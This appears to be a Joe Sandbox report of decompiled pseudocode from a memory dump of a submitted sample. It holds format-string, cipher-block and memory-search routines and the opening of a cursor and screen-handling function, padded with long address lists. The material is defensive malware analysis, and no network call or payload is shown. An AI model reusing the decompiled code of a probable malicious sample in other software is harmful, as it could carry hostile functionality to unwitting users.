                    0x00000000
                    0x0043e0b8
                    0x0043e09f
                    0x0043e0a1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043e0a1
                    0x0043e08c
                    0x0043e08d
                    0x0043e090
                    0x00000000
                    0x00000000
                    0x0043e092
                    0x00000000
                    0x0043e092
                    0x00000000
                    0x0043e07f
                    0x0043e070
                    0x0043e071
                    0x0043e074
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043e074
                    0x0043e03f
                    0x0043e042
                    0x0043e044
                    0x0043e04f
                    0x0043e051
                    0x0043e059
                    0x0043e05b
                    0x0043e05d
                    0x00000000
                    0x00000000
                    0x0043e05f
                    0x0043e063
                    0x0043e063
                    0x00000000
                    0x0043e063
                    0x0043e053
                    0x0043e048
                    0x0043e048
                    0x0043e049
                    0x00000000
                    0x0043e049
                    0x0043e046
                    0x00000000
                    0x0043e046
                    0x0043df7a
                    0x00000000
                    0x0043df7a
                    0x0043e006
                    0x0043e006
                    0x0043e009
                    0x0043dfdb
                    0x0043dfdb
                    0x0043dfdc
                    0x0043dfde
                    0x0043dfe0
                    0x00000000
                    0x0043dfe0
                    0x0043e00b
                    0x0043e00e
                    0x00000000
                    0x00000000
                    0x0043e014
                    0x0043df83
                    0x0043df83
                    0x00000000
                    0x0043df83
                    0x0043dfaf
                    0x0043dff2
                    0x00000000
                    0x0043dff2
                    0x0043dfb1
                    0x0043dfb4
                    0x0043dfe7
                    0x0043dfe9
                    0x00000000
                    0x0043dfe9
                    0x0043dfb6
                    0x0043dfb9
                    0x0043dfd7
                    0x0043dfd7
                    0x0043dfd7
                    0x0043dfd7
                    0x00000000
                    0x0043dfd7
                    0x0043dfbb
                    0x0043dfbe
                    0x0043dfd0
                    0x00000000
                    0x0043dfd0
                    0x0043dfc0
                    0x0043dfc3
                    0x00000000
                    0x00000000
                    0x0043dfc7
                    0x00000000
                    0x0043dfc7
                    0x0043df3f
                    0x00000000
                    0x00000000
                    0x0043df45
                    0x0043df47
                    0x0043df87
                    0x0043df87
                    0x0043df8a
                    0x0043dfa3
                    0x00000000
                    0x0043dfa3
                    0x0043df8c
                    0x0043df8c
                    0x0043df8f
                    0x00000000
                    0x00000000
                    0x0043df92
                    0x0043df95
                    0x00000000
                    0x00000000
                    0x0043df97
                    0x0043df9a
                    0x00000000
                    0x0043df9a
                    0x0043df49
                    0x0043df81
                    0x00000000
                    0x0043df81
                    0x0043df4d
                    0x00000000
                    0x00000000
                    0x0043df56
                    0x00000000
                    0x00000000
                    0x0043df5b
                    0x00000000
                    0x00000000
                    0x0043df60
                    0x00000000
                    0x00000000
                    0x0043df69
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d22b75ae8a61c7ad0eac6e986b5b4c9b91ea87615a1a65b91a0678d964af2e5a
                    • Instruction ID: 151d6b777b14aa63b1a924b7aa8fcf51d59d81b34cc0c805e69b65ec988575ed
                    • Opcode Fuzzy Hash: d22b75ae8a61c7ad0eac6e986b5b4c9b91ea87615a1a65b91a0678d964af2e5a
                    • Instruction Fuzzy Hash: 59617771A0020992DF38592AA8D17BF23A4AB0D744F14351BF883DB3C1D69DED42875E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0043D85D(intOrPtr* __ecx) {
                    				char _v6;
                    				char _v8;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				char _t49;
                    				signed int _t50;
                    				void* _t51;
                    				signed char _t54;
                    				signed char _t56;
                    				signed int _t57;
                    				signed int _t58;
                    				signed char _t67;
                    				signed char _t69;
                    				signed char _t71;
                    				signed char _t80;
                    				signed char _t82;
                    				signed int _t84;
                    				signed int _t86;
                    				signed int _t87;
                    				signed char _t92;
                    				void* _t95;
                    				intOrPtr _t100;
                    				unsigned int _t102;
                    				signed char _t104;
                    				void* _t112;
                    				unsigned int _t113;
                    				void* _t114;
                    				signed int _t115;
                    				signed int* _t116;
                    				intOrPtr* _t119;
                    				void* _t121;
                    				void* _t122;
                    				void* _t124;
                    				void* _t125;
                    
                    				_push(__ecx);
                    				_t119 = __ecx;
                    				_t92 = 1;
                    				_t49 =  *((char*)(__ecx + 0x31));
                    				_t124 = _t49 - 0x64;
                    				if(_t124 > 0) {
                    					__eflags = _t49 - 0x70;
                    					if(__eflags > 0) {
                    						_t50 = _t49 - 0x73;
                    						__eflags = _t50;
                    						if(_t50 == 0) {
                    							L9:
                    							_t51 = E0043E8D7(_t119);
                    							L10:
                    							if(_t51 != 0) {
                    								__eflags =  *((char*)(_t119 + 0x30));
                    								if( *((char*)(_t119 + 0x30)) == 0) {
                    									_t113 =  *(_t119 + 0x20);
                    									_push(_t114);
                    									_v8 = 0;
                    									_t115 = 0;
                    									_v6 = 0;
                    									_t54 = _t113 >> 4;
                    									__eflags = _t92 & _t54;
                    									if((_t92 & _t54) == 0) {
                    										L46:
                    										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                    										__eflags = _t100 - 0x78;
                    										if(_t100 == 0x78) {
                    											L48:
                    											_t56 = _t113 >> 5;
                    											__eflags = _t92 & _t56;
                    											if((_t92 & _t56) != 0) {
                    												L50:
                    												__eflags = _t100 - 0x61;
                    												if(_t100 == 0x61) {
                    													L53:
                    													_t57 = 1;
                    													L54:
                    													__eflags = _t92;
                    													if(_t92 != 0) {
                    														L56:
                    														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                    														__eflags = _t100 - 0x58;
                    														if(_t100 == 0x58) {
                    															L59:
                    															_t58 = 1;
                    															L60:
                    															__eflags = _t58;
                    															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                    															_t115 = _t115 + 2;
                    															__eflags = _t115;
                    															L61:
                    															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                    															__eflags = _t113 & 0x0000000c;
                    															if((_t113 & 0x0000000c) == 0) {
                    																E0043C471(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                    																_t122 = _t122 + 0x10;
                    															}
                    															E0043EE46(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                    															_t102 =  *(_t119 + 0x20);
                    															_t116 = _t119 + 0x18;
                    															_t67 = _t102 >> 3;
                    															__eflags = _t67 & 0x00000001;
                    															if((_t67 & 0x00000001) != 0) {
                    																_t104 = _t102 >> 2;
                    																__eflags = _t104 & 0x00000001;
                    																if((_t104 & 0x00000001) == 0) {
                    																	E0043C471(_t119 + 0x448, 0x30, _t95, _t116);
                    																	_t122 = _t122 + 0x10;
                    																}
                    															}
                    															E0043EBE2(_t95, _t119, _t116, _t119, 0);
                    															__eflags =  *_t116;
                    															if( *_t116 >= 0) {
                    																_t71 =  *(_t119 + 0x20) >> 2;
                    																__eflags = _t71 & 0x00000001;
                    																if((_t71 & 0x00000001) != 0) {
                    																	E0043C471(_t119 + 0x448, 0x20, _t95, _t116);
                    																}
                    															}
                    															_t69 = 1;
                    															L70:
                    															return _t69;
                    														}
                    														__eflags = _t100 - 0x41;
                    														if(_t100 == 0x41) {
                    															goto L59;
                    														}
                    														_t58 = 0;
                    														goto L60;
                    													}
                    													__eflags = _t57;
                    													if(_t57 == 0) {
                    														goto L61;
                    													}
                    													goto L56;
                    												}
                    												__eflags = _t100 - 0x41;
                    												if(_t100 == 0x41) {
                    													goto L53;
                    												}
                    												_t57 = 0;
                    												goto L54;
                    											}
                    											L49:
                    											_t92 = 0;
                    											__eflags = 0;
                    											goto L50;
                    										}
                    										__eflags = _t100 - 0x58;
                    										if(_t100 != 0x58) {
                    											goto L49;
                    										}
                    										goto L48;
                    									}
                    									_t80 = _t113 >> 6;
                    									__eflags = _t92 & _t80;
                    									if((_t92 & _t80) == 0) {
                    										__eflags = _t92 & _t113;
                    										if((_t92 & _t113) == 0) {
                    											_t82 = _t113 >> 1;
                    											__eflags = _t92 & _t82;
                    											if((_t92 & _t82) == 0) {
                    												goto L46;
                    											}
                    											_v8 = 0x20;
                    											L45:
                    											_t115 = _t92;
                    											goto L46;
                    										}
                    										_v8 = 0x2b;
                    										goto L45;
                    									}
                    									_v8 = 0x2d;
                    									goto L45;
                    								}
                    								_t69 = _t92;
                    								goto L70;
                    							}
                    							L11:
                    							_t69 = 0;
                    							goto L70;
                    						}
                    						_t84 = _t50;
                    						__eflags = _t84;
                    						if(__eflags == 0) {
                    							L28:
                    							_push(0);
                    							_push(0xa);
                    							L29:
                    							_t51 = E0043E6E2(_t119, _t114, __eflags);
                    							goto L10;
                    						}
                    						__eflags = _t84 - 3;
                    						if(__eflags != 0) {
                    							goto L11;
                    						}
                    						_push(0);
                    						L13:
                    						_push(0x10);
                    						goto L29;
                    					}
                    					if(__eflags == 0) {
                    						_t51 = E0043E8BF(__ecx);
                    						goto L10;
                    					}
                    					__eflags = _t49 - 0x67;
                    					if(_t49 <= 0x67) {
                    						L30:
                    						_t51 = E0043E2EE(_t92, _t119, _t112);
                    						goto L10;
                    					}
                    					__eflags = _t49 - 0x69;
                    					if(_t49 == 0x69) {
                    						L27:
                    						_t2 = _t119 + 0x20;
                    						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                    						__eflags =  *_t2;
                    						goto L28;
                    					}
                    					__eflags = _t49 - 0x6e;
                    					if(_t49 == 0x6e) {
                    						_t51 = E0043E82C(__ecx, _t112);
                    						goto L10;
                    					}
                    					__eflags = _t49 - 0x6f;
                    					if(_t49 != 0x6f) {
                    						goto L11;
                    					}
                    					_t51 = E0043E8A0(__ecx);
                    					goto L10;
                    				}
                    				if(_t124 == 0) {
                    					goto L27;
                    				}
                    				_t125 = _t49 - 0x58;
                    				if(_t125 > 0) {
                    					_t86 = _t49 - 0x5a;
                    					__eflags = _t86;
                    					if(_t86 == 0) {
                    						_t51 = E0043E228(__ecx);
                    						goto L10;
                    					}
                    					_t87 = _t86 - 7;
                    					__eflags = _t87;
                    					if(_t87 == 0) {
                    						goto L30;
                    					}
                    					__eflags = _t87;
                    					if(__eflags != 0) {
                    						goto L11;
                    					}
                    					L17:
                    					_t51 = E0043E5BA(_t92, _t119, __eflags, 0);
                    					goto L10;
                    				}
                    				if(_t125 == 0) {
                    					_push(1);
                    					goto L13;
                    				}
                    				if(_t49 == 0x41) {
                    					goto L30;
                    				}
                    				if(_t49 == 0x43) {
                    					goto L17;
                    				}
                    				if(_t49 <= 0x44) {
                    					goto L11;
                    				}
                    				if(_t49 <= 0x47) {
                    					goto L30;
                    				}
                    				if(_t49 != 0x53) {
                    					goto L11;
                    				}
                    				goto L9;
                    			}






































                    0x0043d862
                    0x0043d865
                    0x0043d869
                    0x0043d86c
                    0x0043d870
                    0x0043d873
                    0x0043d8e1
                    0x0043d8e4
                    0x0043d933
                    0x0043d933
                    0x0043d936
                    0x0043d8a3
                    0x0043d8a5
                    0x0043d8aa
                    0x0043d8ac
                    0x0043d951
                    0x0043d955
                    0x0043d95e
                    0x0043d963
                    0x0043d964
                    0x0043d968
                    0x0043d96a
                    0x0043d96f
                    0x0043d972
                    0x0043d974
                    0x0043d99d
                    0x0043d99d
                    0x0043d9a0
                    0x0043d9a3
                    0x0043d9aa
                    0x0043d9ac
                    0x0043d9af
                    0x0043d9b1
                    0x0043d9b5
                    0x0043d9b5
                    0x0043d9b8
                    0x0043d9c3
                    0x0043d9c3
                    0x0043d9c5
                    0x0043d9c5
                    0x0043d9c7
                    0x0043d9cd
                    0x0043d9cd
                    0x0043d9d2
                    0x0043d9d5
                    0x0043d9e0
                    0x0043d9e0
                    0x0043d9e2
                    0x0043d9e2
                    0x0043d9ed
                    0x0043d9f1
                    0x0043d9f1
                    0x0043d9f4
                    0x0043d9fa
                    0x0043d9fc
                    0x0043d9ff
                    0x0043da0f
                    0x0043da14
                    0x0043da14
                    0x0043da29
                    0x0043da2e
                    0x0043da31
                    0x0043da36
                    0x0043da39
                    0x0043da3b
                    0x0043da3d
                    0x0043da40
                    0x0043da43
                    0x0043da50
                    0x0043da55
                    0x0043da55
                    0x0043da43
                    0x0043da5c
                    0x0043da61
                    0x0043da64
                    0x0043da69
                    0x0043da6c
                    0x0043da6e
                    0x0043da7b
                    0x0043da80
                    0x0043da6e
                    0x0043da83
                    0x0043da86
                    0x0043da8b
                    0x0043da8b
                    0x0043d9d7
                    0x0043d9da
                    0x00000000
                    0x00000000
                    0x0043d9dc
                    0x00000000
                    0x0043d9dc
                    0x0043d9c9
                    0x0043d9cb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043d9cb
                    0x0043d9ba
                    0x0043d9bd
                    0x00000000
                    0x00000000
                    0x0043d9bf
                    0x00000000
                    0x0043d9bf
                    0x0043d9b3
                    0x0043d9b3
                    0x0043d9b3
                    0x00000000
                    0x0043d9b3
                    0x0043d9a5
                    0x0043d9a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0043d9a8
                    0x0043d978
                    0x0043d97b
                    0x0043d97d
                    0x0043d985
                    0x0043d987
                    0x0043d991
                    0x0043d993
                    0x0043d995
                    0x00000000
                    0x00000000
                    0x0043d997
                    0x0043d99b
                    0x0043d99b
                    0x00000000
                    0x0043d99b
                    0x0043d989
                    0x00000000
                    0x0043d989
                    0x0043d97f
                    0x00000000
                    0x0043d97f
                    0x0043d957
                    0x00000000
                    0x0043d957
                    0x0043d8b2
                    0x0043d8b2
                    0x00000000
                    0x0043d8b2
                    0x0043d93d
                    0x0043d93d
                    0x0043d940
                    0x0043d912
                    0x0043d912
                    0x0043d913
                    0x0043d915
                    0x0043d917
                    0x00000000
                    0x0043d917
                    0x0043d942
                    0x0043d945
                    0x00000000
                    0x00000000
                    0x0043d94b
                    0x0043d8ba
                    0x0043d8ba
                    0x00000000
                    0x0043d8ba
                    0x0043d8e6
                    0x0043d929
                    0x00000000
                    0x0043d929
                    0x0043d8e8
                    0x0043d8eb
                    0x0043d91e
                    0x0043d920
                    0x00000000
                    0x0043d920
                    0x0043d8ed
                    0x0043d8f0
                    0x0043d90e
                    0x0043d90e
                    0x0043d90e
                    0x0043d90e
                    0x00000000
                    0x0043d90e
                    0x0043d8f2
                    0x0043d8f5
                    0x0043d907
                    0x00000000
                    0x0043d907
                    0x0043d8f7
                    0x0043d8fa
                    0x00000000
                    0x00000000
                    0x0043d8fe
                    0x00000000
                    0x0043d8fe
                    0x0043d875
                    0x00000000
                    0x00000000
                    0x0043d87b
                    0x0043d87e
                    0x0043d8be
                    0x0043d8be
                    0x0043d8c1
                    0x0043d8da
                    0x00000000
                    0x0043d8da
                    0x0043d8c3
                    0x0043d8c3
                    0x0043d8c6
                    0x00000000
                    0x00000000
                    0x0043d8c9
                    0x0043d8cc
                    0x00000000
                    0x00000000
                    0x0043d8ce
                    0x0043d8d1
                    0x00000000
                    0x0043d8d1
                    0x0043d880
                    0x0043d8b9
                    0x00000000
                    0x0043d8b9
                    0x0043d885
                    0x00000000
                    0x00000000
                    0x0043d88e
                    0x00000000
                    0x00000000
                    0x0043d893
                    0x00000000
                    0x00000000
                    0x0043d898
                    0x00000000
                    0x00000000
                    0x0043d8a1
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6423814f15c7c7129ec9e77c177fb96c4894879730bd6b4cbfa2f8461761903
                    • Instruction ID: 269c3c9cb07efed3dcf91aba531c36ef6b9d34c3e692930ca70e7f3cf2283721
                    • Opcode Fuzzy Hash: a6423814f15c7c7129ec9e77c177fb96c4894879730bd6b4cbfa2f8461761903
                    • Instruction Fuzzy Hash: B55199A1E0464457DB3CAA28B5567FF27999F0E304F18341BE892C7382C20DEE42C35E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E004275CD(void* __ecx, void* __edx, signed int _a4, void* _a8, signed int _a12, void* _a16, int _a20) {
                    				char _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				void* __edi;
                    				void* _t100;
                    				void* _t143;
                    				void* _t144;
                    				signed int* _t152;
                    				signed int _t187;
                    				signed int _t190;
                    				unsigned int _t192;
                    				unsigned int _t194;
                    				signed int _t195;
                    				signed int _t198;
                    				signed int* _t199;
                    
                    				_t199 =  &_v48;
                    				asm("xorps xmm0, xmm0");
                    				asm("movlpd [esp+0x18], xmm0");
                    				_t143 = __edx;
                    				asm("movlpd [esp+0x24], xmm0");
                    				E00436320( &_v16, __ecx + 0x124, 0x10);
                    				E00426774( &_v16,  &_v16);
                    				_t195 = _a4;
                    				_t100 = 0;
                    				if(_t195 == 0 || _t143 == 0) {
                    					L7:
                    					_t187 = _a12;
                    					if(_t187 == 0) {
                    						L14:
                    						_v36 = _v36 ^ (0 << 0x00000020 | _t187) << 0x3;
                    						_t152 =  &_v48;
                    						_v44 = _v44 ^ (0 << 0x00000020 | _t195) << 0x3;
                    						_v48 = _v48 ^ _t195 << 0x00000003;
                    						_v40 = _v40 ^ _t187 << 0x00000003;
                    						E00427464(_t152,  &_v16);
                    						_push(_t152);
                    						E00426774( &_v48,  &_v48);
                    						return E00436320(_a16,  &_v48, _a20);
                    					}
                    					_t144 = _a8;
                    					if(_t144 == 0) {
                    						goto L14;
                    					}
                    					_t192 = _t187 >> 4;
                    					_t198 = _t187 & 0x0000000f;
                    					if(_t192 == 0) {
                    						L11:
                    						if(_t198 != 0) {
                    							E004368A0(_t187,  &_v32, 0, 0x10);
                    							_t199 =  &(_t199[3]);
                    							E00436320( &_v32, _t144, _t198);
                    							E00426774( &_v32,  &_v32);
                    							_v48 = _v48 ^ _v32;
                    							_v44 = _v44 ^ _v28;
                    							_v40 = _v40 ^ _v24;
                    							_v36 = _v36 ^ _v20;
                    							E00427464( &_v48,  &_v16);
                    						}
                    						_t195 = _a4;
                    						goto L14;
                    					} else {
                    						goto L10;
                    					}
                    					do {
                    						L10:
                    						E00436320( &_v32, _t144, 0x10);
                    						E00426774( &_v32,  &_v32);
                    						_v48 = _v48 ^ _v32;
                    						_v44 = _v44 ^ _v28;
                    						_v40 = _v40 ^ _v24;
                    						_v36 = _v36 ^ _v20;
                    						E00427464( &_v48,  &_v16);
                    						_t144 = _t144 + 0x10;
                    						_t192 = _t192 - 1;
                    					} while (_t192 != 0);
                    					goto L11;
                    				} else {
                    					_t194 = _t195 >> 4;
                    					_t190 = _t195 & 0x0000000f;
                    					if(_t194 == 0) {
                    						L5:
                    						if(_t190 != 0) {
                    							E004368A0(_t190,  &_v32, _t100, 0x10);
                    							_t199 =  &(_t199[3]);
                    							E00436320( &_v32, _t143, _t190);
                    							E00426774( &_v32,  &_v32);
                    							_v48 = _v48 ^ _v32;
                    							_v44 = _v44 ^ _v28;
                    							_v40 = _v40 ^ _v24;
                    							_v36 = _v36 ^ _v20;
                    							E00427464( &_v48,  &_v16);
                    						}
                    						goto L7;
                    					} else {
                    						goto L3;
                    					}
                    					do {
                    						L3:
                    						E00436320( &_v32, _t143, 0x10);
                    						E00426774( &_v32,  &_v32);
                    						_v48 = _v48 ^ _v32;
                    						_v44 = _v44 ^ _v28;
                    						_v40 = _v40 ^ _v24;
                    						_v36 = _v36 ^ _v20;
                    						E00427464( &_v48,  &_v16);
                    						_t143 = _t143 + 0x10;
                    						_t194 = _t194 - 1;
                    					} while (_t194 != 0);
                    					_t100 = 0;
                    					goto L5;
                    				}
                    			}
























                    0x004275cd
                    0x004275da
                    0x004275e4
                    0x004275eb
                    0x004275ed
                    0x004275f3
                    0x00427600
                    0x00427605
                    0x00427609
                    0x0042760e
                    0x004276d7
                    0x004276d7
                    0x004276dd
                    0x004277ad
                    0x004277bd
                    0x004277c1
                    0x004277c5
                    0x004277cc
                    0x004277d3
                    0x004277d7
                    0x004277e0
                    0x004277e3
                    0x00427805
                    0x00427805
                    0x004276e3
                    0x004276e9
                    0x00000000
                    0x00000000
                    0x004276f3
                    0x004276f6
                    0x004276fb
                    0x0042774d
                    0x0042774f
                    0x0042775a
                    0x0042775f
                    0x00427769
                    0x00427776
                    0x00427783
                    0x0042778b
                    0x00427793
                    0x0042779b
                    0x004277a4
                    0x004277a4
                    0x004277a9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004276fd
                    0x004276fd
                    0x00427705
                    0x00427712
                    0x0042771f
                    0x00427727
                    0x0042772f
                    0x00427737
                    0x00427740
                    0x00427745
                    0x00427748
                    0x00427748
                    0x00000000
                    0x0042761c
                    0x00427620
                    0x00427623
                    0x00427628
                    0x0042767c
                    0x0042767e
                    0x00427688
                    0x0042768d
                    0x00427697
                    0x004276a4
                    0x004276b1
                    0x004276b9
                    0x004276c1
                    0x004276c9
                    0x004276d2
                    0x004276d2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0042762a
                    0x0042762a
                    0x00427632
                    0x0042763f
                    0x0042764c
                    0x00427654
                    0x0042765c
                    0x00427664
                    0x0042766d
                    0x00427672
                    0x00427675
                    0x00427675
                    0x0042767a
                    0x00000000
                    0x0042767a

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9aa2f18e3e85f72152ca45c4092c5cd4ff6d95f3282a9b6642ffb600acd1aaac
                    • Instruction ID: 87506a721100b210ee1e0dee801580d249b2388cb4295bb4037fbdf266d4aa3f
                    • Opcode Fuzzy Hash: 9aa2f18e3e85f72152ca45c4092c5cd4ff6d95f3282a9b6642ffb600acd1aaac
                    • Instruction Fuzzy Hash: 75616D36A083059FD304DF35E481A5BB7E4AFCC718F854E2EF49596255EB34EA088B86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00438180(signed int _a4, signed char _a8, intOrPtr _a12) {
                    				intOrPtr _t13;
                    				void* _t14;
                    				signed char _t20;
                    				signed char _t24;
                    				signed int _t27;
                    				signed char _t32;
                    				unsigned int _t33;
                    				signed char _t35;
                    				signed char _t37;
                    				signed int _t39;
                    
                    				_t13 = _a12;
                    				if(_t13 == 0) {
                    					L11:
                    					return _t13;
                    				} else {
                    					_t39 = _a4;
                    					_t20 = _a8;
                    					if((_t39 & 0x00000003) == 0) {
                    						L5:
                    						_t14 = _t13 - 4;
                    						if(_t14 < 0) {
                    							L8:
                    							_t13 = _t14 + 4;
                    							if(_t13 == 0) {
                    								goto L11;
                    							} else {
                    								while(1) {
                    									_t24 =  *_t39;
                    									_t39 = _t39 + 1;
                    									if((_t24 ^ _t20) == 0) {
                    										goto L20;
                    									}
                    									_t13 = _t13 - 1;
                    									if(_t13 != 0) {
                    										continue;
                    									} else {
                    										goto L11;
                    									}
                    									goto L24;
                    								}
                    								goto L20;
                    							}
                    						} else {
                    							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
                    							do {
                    								_t27 =  *_t39 ^ _t20;
                    								_t39 = _t39 + 4;
                    								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
                    									goto L12;
                    								} else {
                    									_t8 = _t39 - 4; // 0xe82c244c
                    									_t32 =  *_t8 ^ _t20;
                    									if(_t32 == 0) {
                    										_t12 = _t39 - 4; // 0x40d09f
                    										return _t12;
                    									} else {
                    										_t33 = _t32 ^ _t20;
                    										if(_t33 == 0) {
                    											_t11 = _t39 - 3; // 0x40d0a0
                    											return _t11;
                    										} else {
                    											_t35 = _t33 >> 0x00000010 ^ _t20;
                    											if(_t35 == 0) {
                    												_t10 = _t39 - 2; // 0x40d0a1
                    												return _t10;
                    											} else {
                    												if((_t35 ^ _t20) == 0) {
                    													goto L20;
                    												} else {
                    													goto L12;
                    												}
                    											}
                    										}
                    									}
                    								}
                    								goto L24;
                    								L12:
                    								_t14 = _t14 - 4;
                    							} while (_t14 >= 0);
                    							goto L8;
                    						}
                    					} else {
                    						while(1) {
                    							_t37 =  *_t39;
                    							_t39 = _t39 + 1;
                    							if((_t37 ^ _t20) == 0) {
                    								break;
                    							}
                    							_t13 = _t13 - 1;
                    							if(_t13 == 0) {
                    								goto L11;
                    							} else {
                    								if((_t39 & 0x00000003) != 0) {
                    									continue;
                    								} else {
                    									goto L5;
                    								}
                    							}
                    							goto L24;
                    						}
                    						L20:
                    						_t9 = _t39 - 1; // 0x40d0a2
                    						return _t9;
                    					}
                    				}
                    				L24:
                    			}













                    0x00438180
                    0x00438187
                    0x004381dc
                    0x004381dc
                    0x00438189
                    0x00438189
                    0x0043818f
                    0x00438199
                    0x004381b1
                    0x004381b1
                    0x004381b4
                    0x004381c8
                    0x004381c8
                    0x004381cb
                    0x00000000
                    0x004381cd
                    0x004381cd
                    0x004381cd
                    0x004381cf
                    0x004381d4
                    0x00000000
                    0x00000000
                    0x004381d6
                    0x004381d9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004381d9
                    0x00000000
                    0x004381cd
                    0x004381b6
                    0x004381c3
                    0x004381e2
                    0x004381e4
                    0x004381f2
                    0x004381fb
                    0x00000000
                    0x004381fd
                    0x004381fd
                    0x00438200
                    0x00438202
                    0x00438227
                    0x0043822c
                    0x00438204
                    0x00438204
                    0x00438206
                    0x00438221
                    0x00438226
                    0x00438208
                    0x0043820b
                    0x0043820d
                    0x0043821b
                    0x00438220
                    0x0043820f
                    0x00438211
                    0x00000000
                    0x00438213
                    0x00000000
                    0x00438213
                    0x00438211
                    0x0043820d
                    0x00438206
                    0x00438202
                    0x00000000
                    0x004381dd
                    0x004381dd
                    0x004381dd
                    0x00000000
                    0x004381c7
                    0x0043819b
                    0x0043819b
                    0x0043819b
                    0x0043819d
                    0x004381a2
                    0x00000000
                    0x00000000
                    0x004381a4
                    0x004381a7
                    0x00000000
                    0x004381a9
                    0x004381af
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004381af
                    0x00000000
                    0x004381a7
                    0x00438216
                    0x00438216
                    0x0043821a
                    0x0043821a
                    0x00438199
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: 2a071cb6d14490be5e1c37ab00812839c044a5ec126ddc068ca4193f899da4e7
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 0911387724074143DA448A6DD8B46B7E795EACD320F3C62AFF0424B788CE2AA9469508
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0041890B(void* __ecx, signed int __edx, void* __eflags) {
                    				signed int _v16;
                    				char* _v72;
                    				char _v76;
                    				char* _v108;
                    				struct _ICONINFO _v128;
                    				signed int _v146;
                    				signed int _v148;
                    				char _v149;
                    				char _v152;
                    				signed int _v156;
                    				struct tagCURSORINFO _v172;
                    				int _v176;
                    				int _v180;
                    				int _v188;
                    				int _v196;
                    				intOrPtr _v220;
                    				void* _v224;
                    				int _v232;
                    				char _v233;
                    				struct HDC__* _v236;
                    				int _v240;
                    				intOrPtr _v242;
                    				void* _v244;
                    				intOrPtr _v246;
                    				char _v248;
                    				intOrPtr _v250;
                    				signed int _v252;
                    				char _v256;
                    				char _v260;
                    				struct HDC__* _v268;
                    				void* _v284;
                    				void* _v296;
                    				struct HDC__* _v308;
                    				void* __ebx;
                    				void* __ebp;
                    				int _t109;
                    				void* _t116;
                    				void* _t118;
                    				int _t123;
                    				void* _t124;
                    				signed char _t136;
                    				long _t142;
                    				void* _t143;
                    				struct HDC__* _t181;
                    				void* _t186;
                    				void* _t188;
                    				void* _t194;
                    				void* _t204;
                    				signed int _t223;
                    				signed int _t226;
                    				int _t227;
